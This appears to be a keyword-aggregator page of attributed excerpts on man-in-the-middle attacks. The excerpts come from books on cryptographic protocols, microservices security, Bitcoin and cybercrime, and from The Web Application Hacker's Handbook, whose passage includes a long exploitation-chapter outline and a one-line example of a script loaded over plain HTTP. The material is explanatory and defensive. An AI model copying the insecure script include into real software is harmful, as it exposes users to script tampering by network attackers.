A is Alice’s name.
(5) Bob computes H_K(R_B, A), and compares it with what he received from Alice. If the results are identical, then Bob knows that he is communicating with Alice.

This protocol is not secure against a man-in-the-middle attack. In general, a man-in-the-middle attack can defeat any protocol that doesn’t involve a secret of some kind.

Message Authentication

When Bob receives a message from Alice, how does he know it is authentic? If Alice signed her message, this is easy. Alice’s digital signature is enough to convince anyone that the message is authentic.
…
EKE is patented [111].

22.6 Fortified Key Negotiation

This scheme also protects key-negotiation schemes from poorly chosen passwords and man-in-the-middle attacks [47,983]. It uses a hash function of two variables that has a very special property: It has many collisions on the first variable while having effectively no collisions on the second variable.

H′(x, y) = H(H(k, x) mod 2^m, x), where H(k, x) is an ordinary hash function on k and x

Here’s the protocol. Alice and Bob share a secret password, P, and have just exchanged a secret key, K, using Diffie-Hellman key exchange. They use P to check that their two session keys are the same (and that Eve is not attempting a man-in-the-middle attack), without giving P away to Eve.
(1) Alice sends Bob H′(P, K)
(2) Bob computes H′(P, K) and compares his result with what he received from Alice.
Building Microservices by Sam Newman
airport security, Amazon Web Services, anti-pattern, business logic, business process, call centre, continuous integration, Conway's law, create, read, update, delete, defense in depth, don't repeat yourself, Edward Snowden, fail fast, fallacies of distributed computing, fault tolerance, index card, information retrieval, Infrastructure as a Service, inventory management, job automation, Kubernetes, load shedding, loose coupling, microservices, MITM: man-in-the-middle, platform as a service, premature optimization, pull request, recommendation engine, Salesforce, SimCity, social graph, software as a service, source of truth, sunk-cost fallacy, systems thinking, the built environment, the long tail, two-pizza team, web application, WebSocket
Depending on the sensitivity of the data, this might be fine. Some organizations attempt to ensure security at the perimeter of their networks, and therefore assume they don’t need to do anything else when two services are talking together. However, should an attacker penetrate your network, you will have little protection against a typical man-in-the-middle attack. If the attacker decides to intercept and read the data being sent, change the data without you knowing, or even in some circumstances pretend to be the thing you are talking to, you may not know much about it. This is by far the most common form of inside-perimeter trust I see in organizations.
…
If you’re using a gateway, you’ll need to route all in-network traffic via the gateway too, but if each service is handling the integration itself, this approach should just work out of the box. The advantage here is that you’re making use of existing infrastructure, and get to centralize all your service access controls in a central directory server. We’d still need to route this over HTTPS if we wanted to avoid man-in-the-middle attacks. Clients have a set of credentials they use to authenticate themselves with the identity provider, and the service gets the information it needs to decide on any fine-grained authentication. This does mean you’ll need an account for your clients, sometimes referred to as a service account.
…
An alternative approach, as used extensively by Amazon’s S3 APIs for AWS and in parts of the OAuth specification, is to use a hash-based messaging code (HMAC) to sign the request. With HMAC the body request along with a private key is hashed, and the resulting hash is sent along with the request. The server then uses its own copy of the private key and the request body to re-create the hash. If it matches, it allows the request. The nice thing here is that if a man in the middle messes with the request, then the hash won’t match and the server knows the request has been tampered with. And the private key is never sent in the request, so it cannot be compromised in transit! The added benefit is that this traffic can then more easily be cached, and the overhead of generating the hashes may well be lower than handling HTTPS traffic (although your mileage may vary).
Little Brother by Cory Doctorow
Aaron Swartz, airport security, Bayesian statistics, Berlin Wall, citizen journalism, Firefox, game design, Golden Gate Park, Haight Ashbury, Internet Archive, Isaac Newton, Jane Jacobs, Jeff Bezos, John Gilmore, John Perry Barlow, mail merge, Mitch Kapor, MITM: man-in-the-middle, Neal Stephenson, RFID, San Francisco homelessness, Sand Hill Road, Silicon Valley, slashdot, Steve Jobs, Steve Wozniak, Thomas Bayes, web of trust, zero day
If you want, you can make him seem erratic and unreliable so they get rid of him. You can manufacture crises that might make one side or the other reveal the identities of other spies. In short, you own them. This is called the man-in-the-middle attack and if you think about it, it's pretty scary. Someone who man-in-the-middles your communications can trick you in any of a thousand ways. Of course, there's a great way to get around the man-in-the-middle attack: use crypto. With crypto, it doesn't matter if the enemy can see your messages, because he can't decipher them, change them, and re-send them. That's one of the main reasons to use crypto.
…
If it's really easy for anyone to know what your real key is, man-in-the-middle gets harder and harder. But you know what? Making things well-known is just as hard as keeping them secret. Think about it -- how many billions of dollars are spent on shampoo ads and other crap, just to make sure that as many people know about something that some advertiser wants them to know? There's a cheaper way of fixing man-in-the-middle: the web of trust. Say that before you leave HQ, you and your bosses sit down over coffee and actually tell each other your keys. No more man-in-the-middle! You're absolutely certain whose keys you have, because they were put into your own hands.
The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard, Marcus Pinto
business logic, call centre, cloud computing, commoditize, database schema, defense in depth, easy for humans, difficult for computers, Firefox, information retrieval, information security, lateral thinking, machine readable, MITM: man-in-the-middle, MVC pattern, optical character recognition, Ruby on Rails, SQL injection, Turing test, Wayback Machine, web application
It also remains resident within the user's browser if she navigates to other pages within the application.

Man-in-the-Middle Attacks

Earlier chapters described how a suitably positioned attacker can intercept sensitive data, such as passwords and session tokens, if an application uses unencrypted HTTP communications. What is more surprising is that some serious attacks can still be performed even if an application uses HTTPS for all sensitive data and the target user always verifies that HTTPS is being used properly. These attacks involve an "active" man in the middle. Instead of just passively monitoring another user's traffic, this type of attacker also changes some of that traffic on the fly.
…
Many applications use HTTP for nonsensitive content, such as product descriptions and help pages. If such content makes any script includes using absolute URLs, an active man-in-the-middle attack can be used to compromise HTTPS-protected requests on the same domain. For example, an application's help page may contain the following:

<script src="http://wahh-app.com/help.js"></script>

This behavior of using absolute URLs to include scripts over HTTP appears in numerous high-profile applications on the web today. In this situation, an active man-in-the-middle attacker could, of course, modify any HTTP response to execute arbitrary script code.
…
Introduction xxiii
Chapter 1 Web Application (In)security 1: The Evolution of Web Applications 2; Common Web Application Functions 4; Benefits of Web Applications 5; Web Application Security 6; "This Site Is Secure" 7; The Core Security Problem: Users Can Submit Arbitrary Input 9; Key Problem Factors 10; The New Security Perimeter 12; The Future of Web Application Security 14; Summary 15
Chapter 2 Core Defense Mechanisms 17: Handling User Access 18; Authentication 18; Session Management 19; Access Control 20; Handling User Input 21; Varieties of Input 21; Approaches to Input Handling 23; Boundary Validation 25; Multistep Validation and Canonicalization 28; Handling Attackers 30; Handling Errors 30; Maintaining Audit Logs 31; Alerting Administrators 33; Reacting to Attacks 34
Chapter 3
Chapter 4
Chapter 5 Bypassing Client-Side Controls 117: Transmitting Data Via the Client 118; Hidden Form Fields 118; HTTP Cookies 121; URL Parameters 121; The Referer Header 122; Opaque Data 123; The ASP.NET ViewState 124; Capturing User Data: HTML Forms 127; Length Limits 128; Script-Based Validation 129; Disabled Elements 131; Capturing User Data: Browser Extensions 133; Common Browser Extension Technologies 134; Approaches to Browser Extensions 135; Intercepting Traffic from Browser Extensions 135; Decompiling Browser Extensions 139; Attaching a Debugger 151; Native Client Components 153; Handling Client-Side Data Securely 154; Transmitting Data Via the Client 154; Validating Client-Generated Data 155; Logging and Alerting 156; Summary 156; Questions 157
Chapter 6 Attacking Authentication 159: Authentication Technologies 160; Design Flaws in Authentication Mechanisms 161; Bad Passwords 161; Brute-Forcible Login 162; Verbose Failure Messages 166; Vulnerable Transmission of Credentials 169; Password Change Functionality 171; Forgotten Password Functionality 173; "Remember Me" Functionality 176; User Impersonation Functionality 178; Incomplete Validation of Credentials 180; Nonunique Usernames 181; Predictable Usernames 182; Predictable Initial Passwords 183; Insecure Distribution of Credentials 184; Implementation Flaws in Authentication 185; Fail-Open Login Mechanisms 185; Defects in Multistage Login Mechanisms 186; Insecure Storage of Credentials 190; Securing Authentication 191; Use Strong Credentials 192; Handle Credentials Secretively 192; Validate Credentials Properly 193; Prevent Information Leakage 195; Prevent Brute-Force Attacks 196; Prevent Misuse of the Password Change Function 199; Prevent Misuse of the Account Recovery Function 199; Log, Monitor, and Notify 201; Summary 201; Questions 202
Chapter 7 Attacking Session Management 205: The Need for State 206; Alternatives to Sessions 208; Weaknesses in Token Generation 210; Meaningful Tokens 210; Predictable Tokens 213; Encrypted Tokens 223; Weaknesses in Session Token Handling 233; Disclosure of Tokens on the Network 234; Disclosure of Tokens in Logs 237; Vulnerable Mapping of Tokens to Sessions 240; Vulnerable Session Termination 241; Client Exposure to Token Hijacking 243; Liberal Cookie Scope 244; Securing Session Management 248; Generate Strong Tokens 248; Protect Tokens Throughout Their Life Cycle 250; Log, Monitor, and Alert 253; Summary 254; Questions 255
Chapter 8 Attacking Access Controls 257: Common Vulnerabilities 258; Completely Unprotected Functionality 259; Identifier-Based Functions 261; Multistage Functions 262; Static Files 263; Platform Misconfiguration 264; Insecure Access Control Methods 265; Attacking Access Controls 266; Testing with Different User Accounts 267; Testing Multistage Processes 271; Testing with Limited Access 273; Testing Direct Access to Methods 276; Testing Controls Over Static Resources 277; Testing Restrictions on HTTP Methods 278; Securing Access Controls 278; A Multilayered Privilege Model 280; Summary 284; Questions 284
Chapter 9 Attacking Data Stores 287: Injecting into Interpreted Contexts 288; Bypassing a Login 288; Injecting into SQL 291; Exploiting a Basic Vulnerability 292; Injecting into Different Statement Types 294; Finding SQL Injection Bugs 298; Fingerprinting the Database 303; The UNION Operator 304; Extracting Useful Data 308; Extracting Data with UNION 308; Bypassing Filters 311; Second-Order SQL Injection 313; Advanced Exploitation 314; Beyond SQL Injection: Escalating the Database Attack 325; Using SQL Exploitation Tools 328; SQL Syntax and Error Reference 332; Preventing SQL Injection 338; Injecting into NoSQL 342; Injecting into MongoDB 343; Injecting into XPath 344; Subverting Application Logic 345; Informed XPath Injection 346; Blind XPath Injection 347; Finding XPath Injection Flaws 348; Preventing XPath Injection 349; Injecting into LDAP 349; Exploiting LDAP Injection 351; Finding LDAP Injection Flaws 353; Preventing LDAP Injection 354; Summary 354; Questions 354
Chapter 10 Attacking Back-End Components 357: Injecting OS Commands 358; Example 1: Injecting Via Perl 358; Example 2: Injecting Via ASP 360; Injecting Through Dynamic Execution 362; Finding OS Command Injection Flaws 363; Finding Dynamic Execution Vulnerabilities 366; Preventing OS Command Injection 367; Preventing Script Injection Vulnerabilities 368; Manipulating File Paths 368; Path Traversal Vulnerabilities 368; File Inclusion Vulnerabilities 381; Injecting into XML Interpreters 383; Injecting XML External Entities 384; Injecting into SOAP Services 386; Finding and Exploiting SOAP Injection 389; Preventing SOAP Injection 390; Injecting into Back-end HTTP Requests 390; Server-side HTTP Redirection 390; HTTP Parameter Injection 393; Injecting into Mail Services 397; E-mail Header Manipulation 398; SMTP Command Injection 399; Finding SMTP Injection Flaws 400; Preventing SMTP Injection 402; Summary 402; Questions 403
Chapter 11 Attacking Application Logic 405: The Nature of Logic Flaws 406; Real-World Logic Flaws 406; Example 1: Asking the Oracle 407; Example 2: Fooling a Password Change Function 409; Example 3: Proceeding to Checkout 410; Example 4: Rolling Your Own Insurance 412; Example 5: Breaking the Bank 414; Example 6: Beating a Business Limit 416; Example 7: Cheating on Bulk Discounts 418; Example 8: Escaping from Escaping 419; Example 9: Invalidating Input Validation 420; Example 10: Abusing a Search Function 422; Example 11: Snarfing Debug Messages 424; Example 12: Racing Against the Login 426; Avoiding Logic Flaws 428; Summary 429; Questions 430
Chapter 12 Attacking Users: Cross-Site Scripting 431: Varieties of XSS 433; Reflected XSS Vulnerabilities 434; Stored XSS Vulnerabilities 438; DOM-Based XSS Vulnerabilities 440; XSS Attacks in Action 442; Real-World XSS Attacks 442; Payloads for XSS Attacks 443; Delivery Mechanisms for XSS Attacks 447; Finding and Exploiting XSS Vulnerabilities 451; Finding and Exploiting Reflected XSS Vulnerabilities 452; Finding and Exploiting Stored XSS Vulnerabilities 481; Finding and Exploiting DOM-Based XSS Vulnerabilities 487; Preventing XSS Attacks 492; Preventing Reflected and Stored XSS 492; Preventing DOM-Based XSS 496; Summary 498; Questions 498
Chapter 13 Attacking Users: Other Techniques 501: Inducing User Actions 501; Request Forgery 502; UI Redress 511; Capturing Data Cross-Domain 515; Capturing Data by Injecting HTML 516; Capturing Data by Injecting CSS 517; JavaScript Hijacking 519; The Same-Origin Policy Revisited 524; The Same-Origin Policy and Browser Extensions 525; The Same-Origin Policy and HTML5 528; Crossing Domains with Proxy Service Applications 529; Other Client-Side Injection Attacks 531; HTTP Header Injection 531; Cookie Injection 536; Open Redirection Vulnerabilities 540; Client-Side SQL Injection 547; Client-Side HTTP Parameter Pollution 548; Local Privacy Attacks 550; Persistent Cookies 550; Cached Web Content 551; Browsing History 552; Autocomplete 552; Flash Local Shared Objects 553; Silverlight Isolated Storage 553; Internet Explorer userData 554; HTML5 Local Storage Mechanisms 554; Preventing Local Privacy Attacks 554; Attacking ActiveX Controls 555; Finding ActiveX Vulnerabilities 556; Preventing ActiveX Vulnerabilities 558; Attacking the Browser 559; Logging Keystrokes 560; Stealing Browser History and Search Queries 560; Enumerating Currently Used Applications 560; Port Scanning 561; Attacking Other Network Hosts 561; Exploiting Non-HTTP Services 562; Exploiting Browser Bugs 563; DNS Rebinding 563; Browser Exploitation Frameworks 564; Man-in-the-Middle Attacks 566; Summary 568; Questions 568
Chapter 14 Automating Customized Attacks 571: Uses for Customized Automation 572; Enumerating Valid Identifiers 573; The Basic Approach 574; Detecting Hits 574; Scripting the Attack 576; JAttack 577; Harvesting Useful Data 583; Fuzzing for Common Vulnerabilities 586; Putting It All Together: Burp Intruder 590; Barriers to Automation 602; Session-Handling Mechanisms 602; CAPTCHA Controls 610; Summary 613; Questions 613
Chapter 15 Exploiting Information Disclosure 615: Exploiting Error Messages 615; Script Error Messages 616; Stack Traces 617; Informative Debug Messages 618; Server and Database Messages 619; Using Public Information 623; Engineering Informative Error Messages 624; Gathering Published Information 625; Using Inference 626; Preventing Information Leakage 627; Use Generic Error Messages 628; Protect Sensitive Information 628; Minimize Client-Side Information Leakage 629; Summary 629; Questions 630
Chapter 16 Attacking Native Compiled Applications 633: Buffer Overflow Vulnerabilities 634; Stack Overflows 634; Heap Overflows 635; "Off-by-One" Vulnerabilities 636; Detecting Buffer Overflow Vulnerabilities 639; Integer Vulnerabilities 640; Integer Overflows 640; Signedness Errors 641; Detecting Integer Vulnerabilities 642; Format String Vulnerabilities 643; Detecting Format String Vulnerabilities 644; Summary 645; Questions 645
Chapter 17 Attacking Application Architecture 647: Tiered Architectures 647; Attacking Tiered Architectures 648; Securing Tiered Architectures 654; Shared Hosting and Application Service Providers 656; Virtual Hosting 657; Shared Application Services 657; Attacking Shared Environments 658; Securing Shared Environments 665; Summary 667; Questions 667
Chapter 18 Attacking the Application Server 669: Vulnerable Server Configuration 670; Default Credentials 670; Default Content 671; Directory Listings 677; WebDAV Methods 679; The Application Server as a Proxy 682; Misconfigured Virtual Hosting 683; Securing Web Server Configuration 684; Vulnerable Server Software 684; Application Framework Flaws 685; Memory Management Vulnerabilities 687; Encoding and Canonicalization 689; Finding Web Server Flaws 694; Securing Web Server Software 695; Web Application Firewalls 697; Summary 699; Questions 699
Chapter 19 Finding Vulnerabilities in Source Code 701: Approaches to Code Review 702; Black-Box Versus White-Box Testing 702; Code Review Methodology 703; Signatures of Common Vulnerabilities 704; Cross-Site Scripting 704
Chapter 20: Technical Challenges Faced by Scanners 778; Current Products 781; Using a Vulnerability Scanner 783; Other Tools 785; Wikto/Nikto 785; Firebug 785; Hydra 785; Custom Scripts 786; Summary 789
Chapter 21 A Web Application Hacker's Methodology 791: General Guidelines 793
1 Map the Application's Content 795: 1.1 Explore Visible Content 795; 1.2 Consult Public Resources 796; 1.3 Discover Hidden Content 796; 1.4 Discover Default Content 797; 1.5 Enumerate Identifier-Specified Functions 797; 1.6 Test for Debug Parameters 798
2 Analyze the Application 798: 2.1 Identify Functionality 798; 2.2 Identify Data Entry Points 799; 2.3 Identify the Technologies Used 799; 2.4 Map the Attack Surface 800
3 Test Client-Side Controls 800: 3.1 Test Transmission of Data Via the Client 801; 3.2 Test Client-Side Controls Over User Input 801; 3.3 Test Browser Extension Components 802
4 Test the Authentication Mechanism 805: 4.1 Understand the Mechanism 805; 4.2 Test Password Quality 806; 4.3 Test for Username Enumeration 806; 4.4 Test Resilience to Password Guessing 807; 4.5 Test Any Account Recovery Function 807; 4.6 Test Any Remember Me Function 808; 4.7 Test Any Impersonation Function 808; 4.8 Test Username Uniqueness 809; 4.9 Test Predictability of Autogenerated Credentials 809; 4.10 Check for Unsafe Transmission of Credentials 810; 4.11 Check for Unsafe Distribution of Credentials 810; 4.12 Test for Insecure Storage 811; 4.13 Test for Logic Flaws 811; 4.14 Exploit Any Vulnerabilities to Gain Unauthorized Access 813
5 Test the Session Management Mechanism 814: 5.1 Understand the Mechanism 814; 5.2 Test Tokens for Meaning 815; 5.3 Test Tokens for Predictability 816; 5.4 Check for Insecure Transmission of Tokens 817; 5.5 Check for Disclosure of Tokens in Logs 817; 5.6 Check Mapping of Tokens to Sessions 818; 5.7 Test Session Termination 818; 5.8 Check for Session Fixation 819; 5.9 Check for CSRF 820; 5.10 Check Cookie Scope 820
6 Test Access Controls 821: 6.1 Understand the Access Control Requirements 821; 6.2 Test with Multiple Accounts 822; 6.3 Test with Limited Access 822; 6.4 Test for Insecure Access Control Methods 823
7 Test for Input-Based Vulnerabilities 824: 7.1 Fuzz All Request Parameters 824; 7.2 Test for SQL Injection 827; 7.3 Test for XSS and Other Response Injection 829; 7.4 Test for OS Command Injection 832; 7.5 Test for Path Traversal 833; 7.6 Test for Script Injection 835; 7.7 Test for File Inclusion 835
8 Test for Function-Specific Input Vulnerabilities 836: 8.1 Test for SMTP Injection 836; 8.2 Test for Native Software Vulnerabilities 837; 8.3 Test for SOAP Injection 839; 8.4 Test for LDAP Injection 839; 8.5 Test for XPath Injection 840; 8.6 Test for Back-End Request Injection 841; 8.7 Test for XXE Injection 841
9 Test for Logic Flaws 842: 9.1 Identify the Key Attack Surface 842; 9.2 Test Multistage Processes 842; 9.3 Test Handling of Incomplete Input 843; 9.4 Test Trust Boundaries 844; 9.5 Test Transaction Logic 844
10 Test for Shared Hosting Vulnerabilities 845: 10.1 Test Segregation in Shared Infrastructures 845; 10.2 Test Segregation Between ASP-Hosted Applications 845
11 Test for Application Server Vulnerabilities 846: 11.1 Test for Default Credentials 846; 11.2 Test for Default Content 847; 11.3 Test for Dangerous HTTP Methods 847; 11.4 Test for Proxy Functionality 847; 11.5 Test for Virtual Hosting Misconfiguration 847; 11.6 Test for Web Server Software Bugs 848; 11.7 Test for Web Application Firewalling 848
12 Miscellaneous Checks 849: 12.1 Check for DOM-Based Attacks 849; 12.2 Check for Local Privacy Vulnerabilities 850; 12.3 Check for Weak SSL Ciphers 851; 12.4 Check Same-Origin Policy Configuration 851
13 Follow Up Any Information Leakage 852
Index 853

Introduction

This book is a practical guide to discovering and exploiting security flaws in web applications.
Bitcoin for the Befuddled by Conrad Barski
Airbnb, AltaVista, altcoin, bitcoin, blockchain, buttonwood tree, cryptocurrency, Debian, en.wikipedia.org, Ethereum, ethereum blockchain, fiat currency, Isaac Newton, MITM: man-in-the-middle, money: store of value / unit of account / medium of exchange, Network effects, node package manager, p-value, peer-to-peer, price discovery process, QR code, radical decentralization, Satoshi Nakamoto, self-driving car, SETI@home, software as a service, the payments system, Yogi Berra
Black hat hackers, as opposed to white hat hackers, are hackers who have no moral qualms about profiting from and harming their targets.
4. If you don’t understand what a man-in-the-middle attack is, first, be aware that almost anything you do on the Internet is at risk of this assault, especially if you’re connecting from a public Internet connection you don’t fully control. Second, stop reading this chapter now and immediately read the Wikipedia page on this subject at https://en.wikipedia.org/wiki/Man-in-the-middle_attack.

Appendix B: Bitcoin Programming with Bitcoinj

1. The C++ reference implementation is available at https://github.com/bitcoin/bitcoin/.
2.
…
Most important, be aware that we’re using community-maintained source code in our examples; if a clever black hat hacker[3] manages to insert some rogue code into the official library repositories, he or she can steal all your money. Even if you understand the library code perfectly, you run the risk of jeopardizing the safety of your money. For example, as you’re downloading this library code from the Internet, a black hat hacker has many opportunities to perform a man-in-the-middle attack[4] and insert rogue code into a doctored version of the library that is incorporated into your program. As a result, the hacker can steal all your money. Additionally, as mentioned in earlier chapters, hackers can steal your bitcoins in many other ways that aren’t specific to Bitcoin programming.
…
program, 217–218, 220–222
hello-money starter project: creating, 228–229; declarations, 231; hook for detecting money arrival, 234; running and testing, 235–236; writing code, 230–235
hierarchical deterministic wallets, 190
Hill, Austin, 120
history of Bitcoin, 112–116
homebrew (command-line tool), 219
hosted wallets: online services, 36; vs. personal wallets, 34–35
hot storage, 47: vs. cold storage, 33–34
hot wallets, personal, 37–38
human-readable Bitcoin addresses, 10n
hybrid wallets, 187
I
illegal activity, Bitcoin and, 124
impedance mismatch, 57
importing private key, 17, 39, 193, 194–195, 237
installing SPV wallets vs. full wallets, 193
integer factorization, 131
Internet bubble, 120
InterruptedException exception type, 239
irreversibility, of transactions, 25–26, 56: superiority of, 57
J
Java, 226: initializing objects, 231–233; installing, 226–227
java.io.File class, 231
Java JDK (Java Development Kit), 226
java.math.BigInteger class, 231
JavaScript, 213–223: preparing machine for, 218–219; writing Bitcoin program in, 217–218
jelly-filled donut incident, 141–156
JSON-RPC API (JavaScript Object Notation - Remote Protocol Call), 222: limitations of writing Bitcoin programs using, 223
JSON-RPC protocol, 214
K
Kaminsky, Dan, 118
Keynesian economics, 126
Kienzle, Jörg, 110–111
Koblitz curve, 151
Kraken, 64
Krugman, Paul, 117
L
Landauer limit, 157
laptops, private keys on, 44
ledger, 11
length extension, 171n
liability, for stolen bitcoins, 34
lightweight wallets, 192
limit orders, 66
Linux: installing Git, 227; installing Maven, 227; OpenJDK version of Java, 227; setting up Bitcoin Core server, 219
live Bitcoin exchanges, 71
LocalBitcoins.com, 67, 68: escrow service, 70
M
Mac OS: installing Git, 227; installing Maven, 227; setting up Bitcoin Core server, 219
man-in-the-middle attacks, 216
market orders, 65–66
MasterCard, 112
master private key, 188
master public key, 188: generating Bitcoin address with, 190
Maven: empty starter project created with, 228; installing, 227
mBTC (millibitcoins), 9
MD5 (message digest algorithm), 132
meeting places, for Bitcoin transactions, 68
MemoryBlockStore function (bitcoinJ), 237
merchant services, 214
Merkle trees, 192
mesh networks, 169
message digest algorithm (MD5), 132
microbitcoins (µBTC), 9
middleman, buying bitcoins from, 52–57
Miller-Rabin primality test, 90
millibitcoins (mBTC), 9
mining, 5, 20, 26–27, 96, 99, 161–180: in 2030, 201–202; decentralization of, 179–180; difficulty of, 173; distributing new currency with, 167–168; hardware, 174–175; 2030 requirements, 202; energy efficiency of, 178; profitability threshold curves for comparing, 179; need for, 162–168; nodes, 170; pooled, 175–176; practicality, 50; preventing attacks with, 166–167; process for, 168–176; for profit, 176–177; proof-of-work in, 138–139; solving a block, 171
modular arithmetic, 131n
“m of n” private key, 42
money laundering, 112–113
Moore’s law, 179n
Moxie Jean, 67
Multibit, 38
multi-signature addresses, and fragmented private keys, 41–42
multi-signature transactions, 57, 69–70
mvn install command, 230
My Wallet Service, 37
N
Nakamoto, Satoshi, 3, 110, 211: identity, 113; last comment, 114; white paper on Bitcoin, 112
network effect, 120
NetworkParameters structure, 232
newbiecoins.com, 13
newly minted bitcoins, 26–27
Newton, Isaac, Principia, 210–211
node-bitcoin, installing, 218
Node.js library, 217, 221: installing, 218
Node Package Manager, 218
nodes: broadcast only, 169; full, 191; relay, 170
nominal deflation, 126
nonprofit organizations, accepting bitcoins, 18
NXT, 125
O
off-chain transactions, 201
offline transaction signing, 40–41
onCoinsReceived function, 234–235
online wallet services: hosted, 36; personal, 34, 37
Oracle Corporation, 226
orders, placing to buy bitcoins, 65
order of curve, elliptic curve cryptography, 152–153
orphaned blocks, 24–25
P
paper money, color copiers as threat, 110
paper wallets, 39: encrypted, 39–40
passwords, 14, 40: for brain wallet, 45; function of, 40; loss of, 37
Peercoin, 125
PeerGroup object, 233–234, 240
peer-to-peer architecture, 119
pegging, 120
pending transaction, 18
Perrig, Adrian, 110–111
personal wallets: vs. hosted wallet, 34–35; hot storage, 37–38; online services, 37
person-to-person bitcoin purchases, 52, 67–71
point multiplication, 150, 158–159
point-of-sale terminals, watch-only wallet for, 187
polling, Bitcoin programming, 223
pom.xml file, 229, 236–237
pooled mining, 175–176
portability, of currency, 117
Preneel, Bart, 140
price discovery process, 120
privacy, 11n: and criminals, 124; multiple addresses and, 12
private currencies, 2
private key, 11–12, 150: compromise of, 41; extra protection for, 139; fragmented, and multi-signature addresses, 41–42; generating, 37; importing, 237; master, 188; memorizing, 45; parable on, 141–145; reversing function of, 136; security for, 39, 186; signing transaction with, 156; SPV wallets vs. full wallets, 194; storing, 33
profit, mining for, 176–177
programming languages, for Bitcoin network connection, 225–226
proof-of-stake, 125
proof-of-work, 125, 166: and blockchain, 165; in mining, 138–139
protecting bitcoins, 61.
Future Crimes: Everything Is Connected, Everyone Is Vulnerable and What We Can Do About It by Marc Goodman
23andMe, 3D printing, active measures, additive manufacturing, Affordable Care Act / Obamacare, Airbnb, airport security, Albert Einstein, algorithmic trading, Alvin Toffler, Apollo 11, Apollo 13, artificial general intelligence, Asilomar, Asilomar Conference on Recombinant DNA, augmented reality, autonomous vehicles, Baxter: Rethink Robotics, Bill Joy: nanobots, bitcoin, Black Swan, blockchain, borderless world, Boston Dynamics, Brian Krebs, business process, butterfly effect, call centre, Charles Lindbergh, Chelsea Manning, Citizen Lab, cloud computing, Cody Wilson, cognitive dissonance, computer vision, connected car, corporate governance, crowdsourcing, cryptocurrency, data acquisition, data is the new oil, data science, Dean Kamen, deep learning, DeepMind, digital rights, disinformation, disintermediation, Dogecoin, don't be evil, double helix, Downton Abbey, driverless car, drone strike, Edward Snowden, Elon Musk, Erik Brynjolfsson, Evgeny Morozov, Filter Bubble, Firefox, Flash crash, Free Software Foundation, future of work, game design, gamification, global pandemic, Google Chrome, Google Earth, Google Glasses, Gordon Gekko, Hacker News, high net worth, High speed trading, hive mind, Howard Rheingold, hypertext link, illegal immigration, impulse control, industrial robot, information security, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Jaron Lanier, Jeff Bezos, job automation, John Harrison: Longitude, John Markoff, Joi Ito, Jony Ive, Julian Assange, Kevin Kelly, Khan Academy, Kickstarter, Kiva Systems, knowledge worker, Kuwabatake Sanjuro: assassination market, Large Hadron Collider, Larry Ellison, Laura Poitras, Law of Accelerating Returns, Lean Startup, license plate recognition, lifelogging, litecoin, low earth orbit, M-Pesa, machine translation, Mark Zuckerberg, Marshall McLuhan, Menlo Park, Metcalfe’s law, MITM: man-in-the-middle, mobile money, more computing power than Apollo, move fast and break things, Nate Silver, 
national security letter, natural language processing, Nick Bostrom, obamacare, Occupy movement, Oculus Rift, off grid, off-the-grid, offshore financial centre, operational security, optical character recognition, Parag Khanna, pattern recognition, peer-to-peer, personalized medicine, Peter H. Diamandis: Planetary Resources, Peter Thiel, pre–internet, printed gun, RAND corporation, ransomware, Ray Kurzweil, Recombinant DNA, refrigerator car, RFID, ride hailing / ride sharing, Rodney Brooks, Ross Ulbricht, Russell Brand, Salesforce, Satoshi Nakamoto, Second Machine Age, security theater, self-driving car, shareholder value, Sheryl Sandberg, Silicon Valley, Silicon Valley startup, SimCity, Skype, smart cities, smart grid, smart meter, Snapchat, social graph, SoftBank, software as a service, speech recognition, stealth mode startup, Stephen Hawking, Steve Jobs, Steve Wozniak, strong AI, Stuxnet, subscription business, supply-chain management, synthetic biology, tech worker, technological singularity, TED Talk, telepresence, telepresence robot, Tesla Model S, The future is already here, The Future of Employment, the long tail, The Wisdom of Crowds, Tim Cook: Apple, trade route, uranium enrichment, Virgin Galactic, Wall-E, warehouse robotics, Watson beat the top human players on Jeopardy!, Wave and Pay, We are Anonymous. We are Legion, web application, Westphalian system, WikiLeaks, Y Combinator, you are the product, zero day
, whose data centers the spy agency infiltrated without authorization. Using the same basic techniques employed by hackers and organized crime groups, the NSA infected more than fifty thousand computer networks around the world with malicious software in order to get access to targets of interest. The agency even posed as Facebook in numerous “man in the middle” attacks to pursue individuals across their social networks. The technique caused targets of interest to connect through a replica Facebook site controlled by the government, allowing the agency to install malware on the machines of its marks. The NSA did not do all this work by itself, but rather cooperated with sister organizations such as Britain’s NSA equivalent, the Government Communications Headquarters.
…
The profound consequences of the “in screen we trust” mentality can open the door to an array of new crimes, including new ways to commit murder. In response, criminals have developed a panoply of methodologies to profit from a world that has subsumed human intelligence in favor of the digital and the virtual. Nefarious actors are proving particularly adept at so-called man-in-the-middle attacks, wherein they insert themselves between reality and the data we see on our screens. The result? An all-out assault on the integrity of the information we’re stockpiling as a result of the big-data revolution.
Screen of the Crime
For every screen in your life, criminals have developed a plan of attack.
…
Purchases made by criminals with your credit or debit card are automatically struck from the recent transactions list and the online statement before they appear on your screen. Even PDF copies of your banking and credit card transactions sent to your printer are modified before they come out of your machine. When these thieves own you, they really own you. These types of man-in-the-middle attacks are powerful reminders that criminal hackers are perfectly capable of intermediating reality for you via the ever-increasing number of screens in your life. Just like the perpetrators of Stuxnet, these criminals recognize that screens are merely a proxy for reality, one that is completely malleable and easily manipulated.
The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age by David E. Sanger
active measures, air gap, autonomous vehicles, Bernie Sanders, Big Tech, bitcoin, Black Lives Matter, Bletchley Park, British Empire, call centre, Cambridge Analytica, Cass Sunstein, Chelsea Manning, computer age, cryptocurrency, cuban missile crisis, disinformation, Donald Trump, drone strike, Edward Snowden, fake news, Google Chrome, Google Earth, information security, Jacob Appelbaum, John Markoff, Kevin Roose, Laura Poitras, Mark Zuckerberg, MITM: man-in-the-middle, mutually assured destruction, off-the-grid, RAND corporation, ransomware, Sand Hill Road, Sheryl Sandberg, Silicon Valley, Silicon Valley ideology, Skype, South China Sea, Steve Bannon, Steve Jobs, Steven Levy, Stuxnet, Tim Cook: Apple, too big to fail, Twitter Arab Spring, undersea cable, unit 8200, uranium enrichment, Valery Gerasimov, WikiLeaks, zero day
ISBN 9780451497895
Ebook ISBN 9780451497918
Cover design by Oliver Munday
For Sherill, whose love and talent make all the wonderful things in life happen
CONTENTS
Cover
Title Page
Copyright
Dedication
PREFACE
PROLOGUE: FROM RUSSIA, WITH LOVE
CHAPTER I: ORIGINAL SINS
CHAPTER II: PANDORA’S INBOX
